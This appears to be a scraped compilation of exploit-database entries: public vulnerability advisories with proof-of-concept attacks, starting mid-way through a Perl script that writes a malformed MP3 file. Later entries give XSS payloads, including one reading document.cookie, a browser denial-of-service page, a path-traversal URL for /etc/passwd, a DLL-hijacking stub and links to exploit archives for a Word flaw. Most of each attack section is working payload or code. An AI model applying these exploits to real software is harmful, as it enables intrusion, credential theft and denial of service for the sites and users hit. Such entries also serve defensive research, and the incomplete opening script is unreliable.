my $cdat= "\x0c\x0b\x0b\x0c\x19\x12\x13\x0f\x14\x1d\x1a\x1f\x1e\x1d\x1a\x1c\x1c\x20\x24\x2e\x27\x20\x22\x2c\x23\x1c\x1c\x28\x2b\x78\x29\x2c\x30\x27\x39\x3d\x30\x3c\x2e\x61\x78\x32\xc3\x83\xc2\xbf\xc3\x83\xef\xbf\xbd";

 
my $file= "dark-puzzle.mp3";
open($FILE,">$file");
print $FILE $id.$cdat;
close($FILE);
print "MP3 File Created , Enjoy !!\n";
HireHackking 
source: https://www.securityfocus.com/bid/55112/info

JPM Article Blog Script 6 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. 

http://www.example.com/forum/index.php?tid=4â??></title><script>alert(Mr.0c3aN)</script>><marquee><h1>ocean</h1></marquee>
HireHackking 
source: https://www.securityfocus.com/bid/55091/info

Mozilla Firefox is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to make the affected computer unresponsive, denying service to legitimate users.

Mozilla Firefox 14.01 is affected; prior versions may also be affected. 

<html>
<head>
<title></title>
</head>
<body></body>
<script>
function e(x)
{
  document.body.innerHTML += x;
  e(x + 'x');
};

e('x')
</script>
</html>
HireHackking 
source: https://www.securityfocus.com/bid/55082/info

LISTSERV is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

LISTSERV 16 is vulnerable; other versions may also be affected. 

http://www.example.com/SCRIPTS/WA.EXE?SHOWTPL=<script>alert(document.cookie)</script>
HireHackking 
Exploit Title: Microsoft Word Local Machine Zone Remote Code Execution Vulnerability
Date: July 15th, 2015
Exploit Author: Eduardo Braun Prado
Vendor Homepage : http://www.microsoft.com
Version: 2007
Tested on: Microsoft Windows  XP, 2003, Vista, 2008, 7, 8, 8.1
CVE: 	CVE-2015-0097

Original Advisory: https://technet.microsoft.com/library/security/ms15-022

Microsoft Word, Excel and Powerpoint 2007 contains a remote code execution vulnerability because it is possible 
to reference documents such as Works document (.wps) as HTML. It will process HTML and script code in the context 
of the local machine zone of Internet Explorer which leads to arbitrary code execution. 
By persuading users into opening eg. specially crafted .WPS, ".doc ", ".RTF " (with a space at the end) 
it is possible to triggerthe vulnerability and run arbitrary code in the context of the logged on Windows user.

Exploit code here :

https://onedrive.live.com/embed?cid=412A36B6D0A9436A&resid=412A36B6D0A9436A%21156&authkey=AA_JVoZcoM5kvOc
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37657.zip
HireHackking 
source: https://www.securityfocus.com/bid/55189/info

PHP Web Scripts Ad Manager Pro is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the web server process. This may aid in further attacks.

Ad Manager Pro version 4.0 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?page=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
HireHackking 
// source: https://www.securityfocus.com/bid/55179/info

Adobe Pixel Bender Toolkit2 is prone to multiple vulnerabilities that allow attackers execute arbitrary code.

An attacker can exploit these issues by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 

#include <windows.h>
#define DllExport __declspec (dllexport)

DllExport void hook_startup() { exp(); }

int exp()
{
  WinExec("calc", 0);
  exit(0);
  return 0;
}
HireHackking 
# phpVibe < 4.20 Stored XSS

# Vendor Homepage: http://www.phpvibe.com
# Affected Versions: prior to 4.20

# Discovered by Filippos Mastrogiannis
# Twitter: @filipposmastro
# LinkedIn: https://www.linkedin.com/pub/filippos-mastrogiannis/68/132/177

-- Description --

This stored XSS vulnerability allows any logged in user
to inject malicious code in the comments section:
e.g. "><body onLoad=confirm("XSS")>

The vulnerability exists because the user input is not properly sanitized
and this can lead to malicious code injection that will be executed on the
target’s browser

-- Proof of Concept --

1. The attacker posts a new comment which contains our payload:
"><body onLoad=confirm("XSS")>

2. The stored XSS can be triggered when any user visits the link of the
uploaded content

-- Solution --

The vendor has fixed the issue in the version 4.21